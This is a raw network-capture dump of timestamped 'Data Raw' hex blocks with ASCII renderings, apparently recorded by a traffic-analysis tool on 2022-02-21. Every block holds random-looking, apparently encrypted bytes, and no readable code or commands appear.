                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC187INData Raw: 23 b9 33 ae 43 0c 57 52 de 23 a5 ab 86 ad ee 30 64 f6 a3 20 22 29 40 ce 53 f6 f3 52 0c a0 48 74 08 5d 37 3a f6 5e e8 cd fd f7 eb 67 bd 5f 75 79 9c 89 48 b0 16 69 8c 76 ff 4e 16 29 d1 9e 12 96 ee f3 d5 80 7b ba 19 c3 ea af ac d7 78 a3 79 71 b0 94 f8 0d 3a 38 3c 45 54 68 d7 fe 6a 9a 92 44 a2 d9 45 51 e8 d0 f7 a9 2a 05 91 2d 4f 65 08 08 05 65 db 4e ba d5 a4 a2 fb 15 2f 3a 6f ff a9 54 5c 1c 36 bd a5 22 bf 10 66 83 c1 5f e2 dd 51 d6 8d 5e f7 94 3a af 7b 61 de cb 44 76 74 ef c5 ca f3 44 30 68 34 af 2f 92 73 9b 62 1e 12 89 a8 12 f6 8e 13 c5 01 23 05 00 98 73 cc ea 82 a5 49 91 b6 68 cd af 35 94 41 6a e2 f8 46 6c e9 0c 37 e8 aa d8 9a 1e 27 bd 36 07 f4 9c 9d de 3a 3b 2b 3e 96 ca 09 93 a9 3b d7 e5 44 77 5a 5c c2 c3 fa 6e af 98 93 c9 59 2b e1 16 1f d9 7c 94 e5 0e 7f
                                                                                                                                                                                                                              Data Ascii: #3CWR#0d ")@SRHt]7:^g_uyHivN){xyq:8<EThjDEQ*-OeeN/:oT\6"f_Q^:{aDvtD0h4/sb#sIh5AjFl7'6:;+>;DwZ\nY+|
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC189INData Raw: 82 bf 09 5a 9c ce c5 52 3c 30 98 9c eb 25 03 f9 90 19 9c 68 c5 06 c1 58 f1 d5 8d 1e d9 73 0c f7 fa f4 7c 69 5c 9e 9a ea 0c b5 83 80 2b a4 93 6f f1 40 4c 79 70 fb 62 3b 94 e6 b0 ac c2 40 0e 46 6f 5f f1 cd e7 58 be e3 0a 05 a4 24 c3 40 44 ac c0 a1 48 ab de 0c f0 bc c9 d6 e8 2c ba 01 a3 8f d8 a5 14 bd ed ff 31 9b 22 2f 61 36 7d 89 2e 4d e4 0d cb 60 33 3d 13 90 20 c6 78 5d 77 f7 e5 84 22 a2 d7 69 78 64 61 01 ea a0 14 94 a2 45 7f 35 38 bf cf 6b d3 34 4c 07 2d 5e bd 38 6f 51 3d 32 7a 79 7c 25 91 ad dc 73 df b5 e7 27 c0 8f e5 a2 68 c7 1e 6c ef 46 dd c7 93 94 79 5e c7 81 30 57 88 17 f9 99 af b8 bf 9e 62 0e 68 79 b5 2b a5 27 32 9c da 19 eb e6 cc 0b 8c c4 d0 9b c2 27 f4 75 32 33 4d 19 31 39 aa f0 d4 0a 35 4c 00 9a b4 c7 61 c3 e2 f9 f0 17 26 85 7c 87 70 c5 f7 15 02
                                                                                                                                                                                                                              Data Ascii: ZR<0%hXs|i\+o@Lypb;@Fo_X$@DH,1"/a6}.M`3= x]w"ixdaE58k4L-^8oQ=2zy|%s'hlFy^0Wbhy+'2'u23M195La&|p
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC190INData Raw: 21 48 ff 11 b5 72 6b bf 0b 62 c9 f7 6d 47 32 1d bb a4 22 fc d1 6d aa 76 ca 7a ce 75 3d 0b 00 4f ec fb 44 55 2c ca a3 48 cb 21 54 0b cb da 17 d1 4d f0 51 38 03 af 3f e3 dd b6 5b 25 48 a5 b2 4e 81 40 e5 d2 96 87 a2 e6 9a 1f 20 94 0b 7c d5 cf 20 78 19 05 57 53 c1 64 ea 28 4b 99 8d 13 cb 40 57 75 3f 13 29 27 24 26 b2 43 0d 11 53 b8 59 fe 24 6a 89 a1 b0 68 bd c8 e4 22 2b 8a b5 77 de 52 a4 b3 75 05 f9 eb 2d fa 3a cc 6b 5d 85 1e 87 f3 3f 6f 10 10 1c 5b df 85 1b 73 f1 84 84 db 19 aa 3c 9d 05 a2 67 b9 b2 95 84 8c 18 31 12 90 7c ad 30 6a 5e bf 31 3b f6 73 99 d2 9e 1e b6 1e 2f 8f 7a 5c 9e 10 0c d8 5d 80 e8 77 29 68 d1 7f 67 2e 31 48 bf 82 3c 4b e2 dd b0 ec 23 ae 55 3d ff d3 4e 9b 2a 8f 88 0c 63 79 04 dc ee b9 f5 56 98 0d f4 0c 40 3c 04 fb e6 29 5e 7f d5 b5 eb 1c 33
                                                                                                                                                                                                                              Data Ascii: !HrkbmG2"mvzu=ODU,H!TMQ8?[%HN@ | xWSd(K@Wu?)'$&CSY$jh"+wRu-:k]?o[s<g1|0j^1;s/z\]w)hg.1H<K#U=N*cyV@<)^3
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC191INData Raw: 50 24 37 31 fa ec 18 e1 da 10 3a 27 df ed 8c 13 1a 39 0a 1a fc c0 10 83 39 7f 1a 0c c5 85 6c 6c e8 0d 17 46 5f b3 b6 8f c5 94 2e ff 18 e5 61 1b 4c ae e8 0e fd 54 22 e8 3d c5 52 e9 cc df 15 c0 df 05 0f 7b 5a bb 5b b9 53 0e e9 c2 46 7f fe 77 f6 57 96 e4 4f 7b d1 7d 2f 60 78 94 6e 8b d8 37 0b 2a c3 91 f4 e9 f2 2f 4e e8 92 84 c5 ea 62 4e 5a b3 b5 f5 a9 32 f2 db 03 6e 43 71 7d 97 8f 5b 42 af 44 bc 12 e6 ce 21 a4 e7 ca ba eb 63 41 ec 66 c4 0f d4 0a 35 3a 97 7e 84 fc 11 4f 8c e5 0b 97 de 81 84 75 b4 f9 4d e2 00 41 b9 8f 3c b7 17 74 b7 73 7e ef a8 33 3a 37 b8 18 e5 e0 83 bd 6f 86 d3 e7 08 c1 ba ce 27 d7 94 bf 1c 89 86 24 ad 7a 5b 49 1b bf 05 d9 62 4b 57 a7 f0 7d 99 eb 03 16 d4 c3 37 5b cb dd fa ca 54 82 35 7f 0f a6 93 76 15 4e 4e d1 53 f1 a1 99 0a ec 98 63 7b e5
                                                                                                                                                                                                                              Data Ascii: P$71:'99llF_.aLT"=R{Z[SFwWO{}/`xn7*/NbNZ2nCq}[BD!cAf5:~OuMA<ts~3:7o'$z[IbKW}7[T5vNNSc{
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC192INData Raw: 68 8b ed 23 cb be 1a 63 7b 47 c5 27 03 bd e0 79 a5 ed 69 e2 15 e5 36 5d a8 59 72 64 87 0d 61 c4 53 66 ca 3b b0 c8 21 2d 1f de 03 29 3e 62 7e 76 ef 83 63 e3 23 f2 2e 37 7d 3e 44 3f 86 0d d8 68 53 d7 c7 df f1 31 f1 f6 82 ce 15 82 9e a6 2f eb bc 05 2b 8b 5d 49 07 fa a5 5b 58 48 e7 af 87 f3 36 a3 8b dd 96 32 e5 5e ac 48 8e 7a d7 dc e8 e3 07 a2 0d 66 72 59 93 44 84 bb 26 3c ce bd 82 93 4f e2 a8 85 ed 23 47 91 a0 3f aa 67 eb 40 e8 26 a4 74 f3 19 48 4b 3b 31 34 13 19 ed e4 2b fd 80 f0 e9 9f f4 fc 65 83 36 dc 4e c5 0e 86 45 32 dc 1d 31 c7 f0 4b 21 87 d2 09 5e 06 04 14 31 78 d3 1e b7 c3 c0 88 83 61 05 72 84 55 68 72 db a3 82 83 d6 58 cf b6 d6 f7 7a b4 cf 28 2a 79 27 f4 94 67 7d c0 f3 5d 3c 9e df 39 dd 33 a4 72 a8 79 21 e2 00 38 6e ad 23 f5 be 24 4f e3 f7 6b 67 49
                                                                                                                                                                                                                              Data Ascii: h#c{G'yi6]YrdaSf;!-)>b~vc#.7}>D?hS1/+]I[XH62^HzfrYD&<O#G?g@&tHK;14+e6NE21K!^1xarUhrXz(*y'g}]<93ry!8n#$OkgI
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC194INData Raw: 64 55 84 90 e5 87 9b bc fa e6 ba 4e e1 ef 4c f9 85 af 38 7e d9 93 d4 8e 22 f2 d9 a2 1d 5d b9 26 62 f3 50 45 af a6 da dd c5 0c cc d3 6c 9e f6 b8 19 9c 2f 42 28 13 9b 47 cf f9 77 df 73 f7 be 75 33 4f a5 47 4b 38 88 3b b0 4b 70 24 23 7e f6 f8 fe b4 e3 1c 33 b2 23 b4 6c 6f 1f 81 8a de 46 42 26 34 3b 37 ef 37 4c 01 ac bd 09 46 97 66 d8 84 46 a8 27 b1 6a cd 88 ec 9c d5 57 85 97 d7 23 61 b6 0e 36 cd 86 a4 79 8c 33 f4 71 bd 74 5c c8 63 37 49 92 ca 38 d0 da ab a2 e5 3e fe 47 4f 4e 5c 9e 8f b6 93 93 3c 7e d2 07 60 c1 ee 3c cc 5a 69 8c d3 bd 0d 28 8c 77 c6 32 48 df 6f 44 9e 38 75 1f 53 46 e8 d8 a5 af 69 5c bc 48 1f bc 06 4f b0 ed e6 ee e3 04 89 49 25 be be 12 49 99 ea ea 1c 9b 34 26 6a 56 48 50 8b 5b a0 7e 68 26 2d 81 00 cc 2b bb 05 b1 a2 f6 de bd 84 e6 05 de a0 ed
                                                                                                                                                                                                                              Data Ascii: dUNL8~"]&bPEl/B(Gwsu3OGK8;Kp$#~3#loFB&4;77LFfF'jW#a6y3qt\c7I8>GON\<~`<Zi(w2HoD8uSFi\HOI%I4&jVHP[~h&-+
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC195INData Raw: dc 0a 01 9d e1 fe 66 0f 1d 2b 95 bf 7b f6 72 ed 65 b3 dd 68 01 de 92 9f 54 69 f7 a4 66 09 e7 8a 49 e5 7b d7 05 6a f5 bd fe 38 91 e2 f5 ba 5b b8 cf 7f 1c a8 1a ad c9 99 85 16 51 54 63 33 a1 22 11 b7 bc 36 e0 8c 17 5d 9f 52 25 00 19 d6 07 ad f3 3e e3 39 3c a2 0f 29 37 ee 5c 39 96 39 a1 a0 3c d5 a2 9b f1 f8 87 5d a0 42 c0 6e 2d 90 96 0a fc 1c bf 7d 57 1c cd b5 a8 d9 15 29 c1 8a fd 4b d5 9d 7a 8e 26 bf d8 54 2d 7f 12 6c 20 28 bf 31 f8 96 30 f9 c3 03 95 a7 1b a1 bd c2 bf d0 af b5 a9 0d dd 0d eb 17 08 e8 a0 b1 43 00 4f fd 7d 0c f7 8b 65 c9 bd d0 a2 f7 c8 1f 5a bb e3 a1 67 30 7b 98 d7 5a 62 af 0f 5b 2b a3 14 cd c1 34 e9 90 54 96 6a a3 16 25 c7 9f b7 6a f3 91 90 50 06 f7 e4 48 12 8d b7 01 69 83 36 a0 a0 95 9e 1a f1 3e 5d 47 b1 ea 0d ae d3 f1 7b 10 e5 81 1c 38 e7
                                                                                                                                                                                                                              Data Ascii: f+{rehTifI{j8[QTc3"6]R%>9<)7\99<]Bn-}W)Kz&T-l (10CO}eZg0{Zb[+4Tj%jPHi6>]G{8
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC196INData Raw: 7b 17 21 a5 6f f4 5d c9 74 7c f8 d5 80 f1 70 ee f0 82 c8 8e 30 d2 6a da 23 18 ab ae e6 6d d6 e3 83 8c 54 9e 11 ae 78 5b e1 1e 05 0f a8 24 4a d4 ee 79 08 31 f4 71 c3 9c 37 82 a5 72 70 a2 ca 54 d0 31 9c 03 ed d6 92 41 28 c7 5d 9f 4c b4 ef a8 e8 08 a3 37 15 2a ec 18 cf 23 38 01 46 45 70 ef 5d 54 d3 9b e3 15 97 4a 61 48 66 8d a6 34 52 e7 31 26 b4 c8 a0 f1 e1 ed 65 15 e7 e1 e6 6d a4 cc 0c 66 d9 b6 f3 9e cc de 14 bb e3 49 d3 52 1f b3 44 0d 67 d1 a0 7e b4 7b 41 06 94 8d ab c1 fb d5 69 6e 8b fe 23 51 af 6e 10 33 9c c1 4a ca f5 8a 1b da 9d 5b b3 ff d7 12 55 27 21 7f 68 bc c1 ef 78 94 45 1a f9 27 a2 fb e6 99 2c 7e 58 34 58 e6 db 33 0e 43 e3 9a 71 5f 0f 6f 44 a2 d9 1a 5e ac db a5 22 fc ab 85 a5 b6 9a f7 84 45 99 84 8d 3f 9a ba b3 09 c4 50 c0 46 4f 4b c2 4e 99 ac 56
                                                                                                                                                                                                                              Data Ascii: {!o]t|p0j#mTx[$Jy1q7rpT1A(]L7*#8FEp]TJaHf4R1&emfIRDg~{Ain#Qn3J[U'!hxE',~X4X3Cq_oD^"E?PFOKNV
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC197INData Raw: 9d 84 6b 39 db 50 e2 69 c6 f0 b2 bc 93 a2 36 57 06 78 53 f1 2e 66 52 ac d9 f8 d3 4a c6 39 eb a7 ac ec 47 70 d7 91 53 d2 d5 97 b7 d6 16 3f d2 45 ed 9c 06 1e 2f c2 58 d5 29 bf b2 b1 1b d7 c4 48 d9 c0 f6 70 f1 40 80 3f b1 23 37 6f 48 f2 9b b7 1c 08 61 fe d9 9a 0c 72 e1 48 5b 81 29 83 a8 5b 23 c5 7e de bb b7 2e 1c c4 74 9e 2a 15 d1 47 91 dd bd c6 92 28 11 68 93 36 e8 19 01 46 b5 6b 9f 1d 6a 88 c4 1a 1a 65 5c 95 26 ff a9 2f 61 8a 48 50 3f e0 b7 f0 54 6a c8 a5 58 38 fc ac fe 7d 7a cd 9e d1 ec a2 7f 07 8d 17 10 f3 c5 f2 11 2a 4d 07 99 76 5b f3 3b 91 2a d5 06 81 2a 3c 47 c1 dd 06 22 2d 0b 2a 67 81 b6 7b 84 b2 d0 ae b3 52 20 3d 16 86 44 90 ec 9a 19 54 46 d2 98 e2 f9 b7 5b 9e bd 45 67 75 65 35 6a 83 57 0d 69 1b 6b 93 93 9c 1b 49 2d 50 fa df 8e 48 1d ce 52 18 cc 6f
                                                                                                                                                                                                                              Data Ascii: k9Pi6WxS.fRJ9GpS?E/X)Hp@?#7oHarH[)[#~.t*G(h6Fkje\&/aHP?TjX8}z*Mv[;**<G"-*g{R =DTF[Egue5jWikI-PHRo
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC199INData Raw: 0e 00 3c cc 8b 74 86 d3 bd 00 95 da f6 7e 8c 50 d1 db d2 bd 24 31 43 5b cb 20 31 6d 70 0c f9 76 b7 e0 66 a3 8e 6e a9 7e 3d 4f db 00 0c d9 6a 96 11 07 21 eb 69 d8 b7 32 b7 28 6a 90 40 67 da 4c 72 e0 28 a9 1b 22 be 70 2a 3c c4 9e b6 1d bb 85 58 88 cf 18 e8 f1 01 71 b6 c4 a4 8d 95 1a a8 1e 96 be 27 61 ed 98 a7 16 ad bf fc 37 c1 cd 87 5b 51 28 0c 8d 14 11 72 58 dc 06 83 d5 b7 50 13 0b ed c0 e0 0b e9 14 92 8b 98 5f 59 25 5a dd 2f fd 4e ea b7 9a 7a 06 35 90 79 72 6e f1 5f 84 05 c4 00 4d dc 3f 51 3f b1 10 6a 14 7c 43 b1 ad 94 14 ca 0f 0a 99 7d d7 dd 3d 07 45 46 94 c0 28 5f 6e 79 0f 7f 42 30 c6 4e ae f3 e4 bf 43 fa dd 0e c7 dd ce f8 76 40 d1 5f 87 96 86 b1 0d 0b b5 e0 13 be ae f8 fb 14 e5 b5 20 50 9f 15 e1 4a 8f a1 c6 50 b1 5b a8 74 a0 df 7b f7 d0 bb a4 b3 7b 44
                                                                                                                                                                                                                              Data Ascii: <t~P$1C[ 1mpvfn~=Oj!i2(j@gLr("p*<Xq'a7[Q(rXP_Y%Z/Nz5yrn_M?Q?j|C}=EF(_nyB0NCv@_ PJP[t{{D
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC200INData Raw: 0d 2c ce af f6 20 db f2 12 58 0e c7 75 a0 71 f0 41 8b 69 22 c9 74 75 ed 25 ea 58 64 21 bf a9 7e 61 87 c8 cf 86 fb ca 4c e7 3c c4 bc fe 50 c5 59 08 43 5f bf 29 ac 75 f0 20 d6 90 0e 7b 1f 77 73 d5 ca 8e 1b 59 8a ee 73 0c 4c c2 92 85 b1 aa 80 4b ca 65 5f 55 97 e3 9e 53 dc de ed 43 b7 6d 54 d3 66 4f 2d 7f af 3f e8 23 e3 5e ab af b1 eb 49 2e 41 d6 b3 5a 1d 0c 49 1d 0c e9 c1 d0 76 da c1 46 53 b5 23 42 3e 63 b1 fc d6 45 bd 01 25 d9 30 90 85 e1 7d 89 10 84 a1 87 45 35 cc e0 74 aa 47 93 c3 ae 51 7a a1 83 4b 15 1b aa 0e b6 d1 a0 7e a1 76 bb d8 32 d8 16 c9 04 b3 f0 39 3c 81 40 ba 37 41 a3 f5 9d de 86 05 3c de b2 a6 04 c3 e5 41 86 4a 31 b0 cf 4b 24 b3 b4 23 c0 23 95 6a f3 de a4 c1 3b 53 3f d8 f0 cd 21 73 96 e5 9a 03 fc 77 70 11 bc 64 72 50 78 d4 52 7b e5 3d 09 92 78
                                                                                                                                                                                                                              Data Ascii: , XuqAi"tu%Xd!~aL<PYC_)u {wsYsLKe_USCmTfO-?#^I.AZIvFS#B>cE%0}E5tGQzK~v29<@7A<AJ1K$##j;S?!swpdrPxR{=x
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC201INData Raw: f4 09 d1 b5 c4 a4 37 88 ac 71 f6 62 78 26 61 6e d1 26 66 90 34 38 33 c6 ad 84 9c ad d7 70 a1 2f a9 b3 2c 19 d3 f4 4c 3c 4e 44 b3 cb a1 09 c2 50 45 a2 5a d1 d6 45 e9 89 23 7f 9c 3a bd 5e 36 91 8a c1 46 d8 89 b2 4d 1c b9 8d 91 58 4b 0c c3 53 10 11 c7 1c 28 75 45 d1 08 a9 27 60 d4 0e 8b b0 a3 d1 33 ac 38 c0 63 38 fb 8f 55 d0 7b fd 1b 30 ba 75 46 cc 3d bf 2b 79 19 07 97 5f 48 76 b1 46 52 9b 8f 13 81 80 2b 80 c0 ed 79 42 a2 8f e2 15 66 71 34 31 5f f8 20 3e 56 ea 3b 8b 75 91 83 7e ca df 7d 4e b4 56 f3 5b 37 92 88 10 51 c1 7e 9b 6e d0 c8 42 a3 e2 e2 80 65 53 9d 5b 5c cc 52 fa 63 a7 95 07 74 60 de 63 fa a4 ae b0 a8 6a 7e 73 49 63 fa 0a 1e bc 30 e7 9a ed 95 e8 31 75 1a 16 9a 4c d7 e9 45 66 0b e6 1a 68 74 e3 8a 84 62 f7 99 e6 86 df 05 63 fa 6d 81 f8 03 60 28 ce c1
                                                                                                                                                                                                                              Data Ascii: 7qbx&an&f483p/,L<NDPEZE#:^6FMXKS(uE'`38c8U{0uF=+y_HvFR+yBfq41_ >V;u~}NV[7Q~nBeS[\Rct`cj~sIc01uLEfhtbcm`(
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC202INData Raw: c9 2e 6a 97 a2 ba 9d 03 46 54 13 c0 68 9b 06 0c 75 ab 3e 2e eb 2c 4f da b4 38 01 ab bc db 42 2b 7a 89 9b 04 a3 69 b5 6f 08 2f 2a 05 96 6e 57 35 7c b9 e3 c1 19 41 7e 26 3f cb af b3 e6 cb 83 45 04 52 33 28 ed 44 2d bc 82 1c 1b b9 52 f8 d7 c1 9c dd 0a f0 96 a0 3f a8 48 f7 49 bf 85 38 c5 9e b6 90 61 bb a0 77 30 4b b8 27 c1 4a 60 b6 4c 1f 63 43 a4 76 3a a6 e5 92 b6 f3 c4 b6 db ac 82 88 98 47 1a af ff 5c ae 69 a2 f7 7c dc de 58 b1 d4 d1 83 7b e3 95 76 01 0b 62 44 21 a4 05 da a2 5c 73 22 7f 15 2f fe 85 5a 9f 8d c3 6d 86 dd b2 94 fe 46 fb 3b 01 f3 bf ad 25 45 b6 64 d0 17 c6 16 1b 54 6a b8 dd 1d d0 dc 3b 55 19 a6 df 8d b1 4f 75 18 2a 6b 78 0f 0b d8 71 45 8d 49 6b 2c 3c b9 25 6d 0a f1 bc 5c 2e 30 c3 93 99 b4 e3 34 29 4d 80 aa e9 2a 21 34 b6 b0 fd 4b 7d 20 b8 d2 85
                                                                                                                                                                                                                              Data Ascii: .jFThu>.,O8B+zio/*nW5|A~&?ER3(D-R?HI8aw0K'J`LcCv:G\i|X{vbD!\s"/ZmF;%EdTj;UOu*kxqEIk,<%m\.04)M*!4K}
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC203INData Raw: 2b 26 23 a1 40 cd 64 be ba f9 a8 0d dd ce 7f 97 5d f0 2a 70 98 13 ca e3 58 2f 81 75 bc b7 06 98 a3 f7 c0 9e 9e 58 f3 ad a4 08 29 15 5a 32 19 52 f0 e2 1e 86 45 cc 4a e0 31 1f 01 46 81 2e 63 b2 c3 4b 80 3b 95 b1 dd 51 06 10 18 73 68 b5 48 52 3a 6b d9 4c 4b 6a c8 a2 5a cf 4a cc 12 2f 29 14 56 57 7b 73 60 40 59 4b 93 52 d5 30 54 f6 30 07 81 54 9e b6 e7 74 6f 46 ee 09 3c dd 35 4a ed fa 66 a8 ed 08 35 47 ef 6a c1 5a 3e eb 33 d9 af 50 ad b2 17 78 27 88 1e 75 c5 16 03 40 6e b3 98 e5 3e 56 2a 79 36 8c fd 0c 3c 4d 67 4e 0d e5 29 9b c3 5e 3d 64 6b 55 f3 d5 1b fb a3 8d 57 68 7f de a3 8b 66 5c 68 af 21 08 8c fa 3f 83 27 1d 61 b3 88 4a 9b 80 a9 34 4d 1a d5 bb bc 51 f9 3f 3f 7f 12 62 b9 be 10 90 72 17 40 7a 94 38 b1 8d a2 c3 c6 70 90 2c e6 01 2f 49 b9 92 84 cb 63 da ad
                                                                                                                                                                                                                              Data Ascii: +&#@d]*pX/uX)Z2REJ1F.cK;QshHR:kLKjZJ/)VW{s`@YKR0T0TtoF<5Jf5GjZ>3Px'u@n>V*y6<MgN)^=dkUWhf\h!?'aJ4MQ??br@z8p,/Ic
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC205INData Raw: 96 2d ef 73 85 ff 4f c9 72 cd 1f 77 34 39 7c a6 26 66 1b 50 2a 83 89 48 b0 1e 91 55 6a 51 9d 3a b1 25 9f 66 60 d6 63 6c 7e 42 11 da c4 22 3f 3c 47 ba 10 65 a1 37 66 31 6b 47 44 8f 1c 70 96 88 ca bd 3b 63 31 ae e1 49 ea af ad a3 1a 23 25 7a dd b3 dc cc 7a b3 89 0d c0 37 98 c5 1f 03 c4 50 91 1f 9b 44 c3 51 99 2f 63 6b 3a bf 18 92 68 f1 53 e1 23 b0 a3 21 36 66 73 87 25 b2 24 ea 06 17 60 ca 66 18 33 59 78 d9 0e 49 d3 41 05 36 e2 27 70 7d 46 41 27 97 b7 4f 76 c7 52 86 f8 b0 49 a9 1d bb a5 2e 14 c7 c4 33 14 75 61 8b a8 66 c4 00 61 cb 58 98 13 c1 2d 1f 55 16 50 38 b5 78 0a d4 de 06 94 2d 1f 2c 48 be e8 e2 1c cd 8c 6b 8d cb cc 0a 72 b4 bc b5 fb 55 af 24 57 5a e6 1f 9e ae fa 32 4b 72 3c 6e c2 3e 2e ae 45 e1 f2 db a5 bc 82 76 5c 2d 6b 3e ba 27 04 86 fb 16 bf 6f f7
                                                                                                                                                                                                                              Data Ascii: -sOrw49|&fP*HUjQ:%f`cl~B"?<Ge7f1kGDp;c1I#%zz7PDQ/ck:hS#!6fs%$`f3YxIA6'p}FA'OvRI.3uafaX-UP8x-,HkrU$WZ2Kr<n>.Ev\-k>'o
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC206INData Raw: a9 04 3e 65 44 4e ee b9 5b 21 cb fb fc 1d 0a 47 c1 9d 4f 95 56 ca b1 54 f3 35 07 bf 9e ae 50 18 02 a9 7e 02 c3 af d3 b1 2e b8 06 e5 3e 07 89 2f af b6 3f 05 5e 30 6e c4 d7 39 78 fa e3 cf 16 40 7e e1 8a 11 51 e3 27 99 e1 1b 12 b8 ba 42 fa ce 67 e1 30 be b5 e0 fa 51 ef 94 66 3d 42 93 73 2b 08 71 3a c6 46 85 d9 33 3e a3 32 28 64 eb a0 14 94 a2 45 40 4e 8d af 9b 81 2d bf 3a 88 47 29 ec d0 b1 7b bc f5 5d 15 70 7a 4f c9 57 e2 9b 21 e7 18 e5 d6 88 c3 8e 38 e1 8d fa 19 63 f3 e1 7d b4 d1 03 91 ec cd d9 8b f1 2a 42 78 e2 5d 07 26 c3 27 af 89 e5 0a 2c 5e 7b d4 9a 5e f9 ac 7d 55 b0 26 87 f6 a5 23 e6 7c 34 92 04 56 75 f7 d4 0a ca 83 fc f7 a1 c6 e2 be 20 f9 b5 1f 60 59 0e f8 16 ea 8c 08 32 81 d1 59 1a 1e 92 d4 39 a1 0a 80 62 48 3b 37 bf a6 e1 54 d5 bd 6c cd de 83 13 fc
                                                                                                                                                                                                                              Data Ascii: >eDN[!GOVT5P~.>/?^0n9x@~Q'Bg0Qf=Bs+q:F3>2(dE@N-:G){]pzOW!8c}*Bx]&',^{^}U&#|4Vu `Y2Y9bH;7Tl
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC207INData Raw: 42 a9 8e dd d7 bb 22 ba 04 47 94 d0 cc 0b a3 45 81 99 2f e8 a5 99 1c 07 00 e3 5f 03 88 b8 6d 3e ba 0e 5a 4d 46 94 f0 f5 3a e8 a1 f1 80 90 9e ae 98 86 d3 b8 14 43 79 19 8d d0 1d 18 4b 7f 2a 0e f1 e9 45 ae 86 9f 80 c0 6f bd a2 39 56 b9 33 e4 b5 a3 7c 49 f8 20 45 89 e6 c4 00 30 16 47 58 f1 b5 25 75 82 39 c3 e5 10 9f 31 10 d2 86 ae ae 3a 38 fe a4 d7 a1 ea 43 1d d6 dd 2e 3b ca 50 de 63 9b cc 3a c0 b8 af 34 12 d0 5c bc c2 ed bf 7b 19 8a ec 44 1f ac b3 23 da 02 55 ca b1 f8 5d 3e ca 26 50 c6 15 e4 13 81 f3 b7 40 27 a2 8e a0 7a 09 7b d8 a5 37 a3 27 f4 52 f8 03 6c 2d ce e9 d4 64 35 9e a8 77 a9 c9 99 56 f6 bc 5f 8b a1 09 23 4f 15 bb 18 34 8d 28 0c 8f 8a df ae 5e 28 34 7f a1 e8 3b 92 48 13 f4 48 34 eb 30 c2 69 75 f1 2d 6b 0e 86 3b 6d 35 4b 1c f9 e6 f7 5d 87 49 2c b3
                                                                                                                                                                                                                              Data Ascii: B"GE/_m>ZMF:CyK*Eo9V3|I E0GX%u91:8C.;Pc:4\{D#U]>&P@'z{7'Rl-d5wV_#O4(^(4;HH40iu-k;m5K]I,
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC208INData Raw: e4 0d cb 60 31 a0 aa 71 62 f8 b2 26 b7 fc b4 a1 5b a4 bc 6b a3 60 7b 26 e7 2b da 58 fa 91 57 6a 0f 47 33 c4 c4 15 0f 0e 7b 8a 28 dc 99 9c 4f 11 0c bd bd 2f 44 1a 04 c0 09 03 6c 89 74 fe 48 f5 d2 7c b6 b7 37 10 97 c3 29 ca b9 53 c7 08 35 33 8f 48 a7 95 a9 1b a6 0d 02 26 96 ff 51 76 ed 80 20 8a 48 5a cc 0c ca 64 5b ce 68 da 43 cb a5 cb ea b5 31 11 31 c0 76 74 10 2e 8d 02 4b 33 3a df e8 3b e0 d3 ae c9 1d cd 0e a4 28 a9 ae d2 20 5f 48 c5 8c 6b 19 38 1a 07 f4 0f 7c af 3d c8 10 0f f6 55 0f 5e 6c 46 06 aa 5e ec ae f9 c5 d7 e3 03 88 0c 9a c2 5e 00 64 6b 4c 65 27 dd 3e 88 3c 43 07 0f 33 36 8e 90 74 38 c7 3b b2 a3 8d 9c dc 96 88 ca 72 d3 d6 92 46 a6 b9 dc db b4 ca d4 5b 85 3e 9e 3b 9e e7 2c 0d 42 4f 6c 8c d3 7b cb 23 a3 55 69 6e 0a 5d 96 c9 28 c8 aa 33 57 4e 6d 10
                                                                                                                                                                                                                              Data Ascii: `1qb&[k`{&+XWjG3{(O/DltH|7)S53H&Qv HZd[hC11vt.K3:;( _Hk8|=U^lF^^dkLe'><C36t8;rF[>;,BOl{#Uin](3WNm
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC210INData Raw: 69 17 f0 e8 89 fc b9 d8 f0 b1 60 da a6 d4 ed 1e 58 30 3f 85 ba da d1 c4 69 22 d7 7c 36 7d 29 2a 24 7f cc 99 1f d6 e8 71 a6 1d e8 9f 4e 15 60 5b 92 9e 73 5a 13 37 12 5d 2e 8f 88 a4 ff 51 cf af c2 e4 7e 3a 25 41 09 8c 91 43 66 c1 ea b2 e8 65 a3 b9 92 2d 03 ac e7 f5 a5 bb 5b 1a 5b 78 b5 5c 8c 3f ce 5a 3c e6 f5 82 93 11 0b 2d 91 2d b3 90 33 65 a0 84 51 0e 7f 2a 08 28 e9 19 cb d5 c2 50 30 07 32 31 dd 0c e5 95 a9 cb 5f 4c 99 90 0b 5f 7d cd 8d bf 88 d9 e6 4d 8d 3e 3c b7 b2 36 67 fc 84 a5 c1 a1 eb 9a 05 e1 11 69 5b cf 9f 89 07 53 b8 16 26 c8 e0 6a c0 8a 6a 76 19 9f f7 4a fc 79 28 4e a2 7f 63 b9 66 dc 34 ff c4 95 44 1a 47 af a6 dc e2 63 cc de ba cc e7 be 54 86 91 a0 76 17 f8 eb 17 ec af af 3d 97 9e b2 f4 f9 a3 37 da 27 b8 78 8a 12 48 58 a6 d8 a9 99 d3 9c 27 ce 12
                                                                                                                                                                                                                              Data Ascii: i`X0?i"|6})*$qN`[sZ7].Q~:%ACfe-[[x\?Z<--3eQ*(P021_L_}M><6gi[S&jjvJy(Ncf4DGcTv=7'xHX'
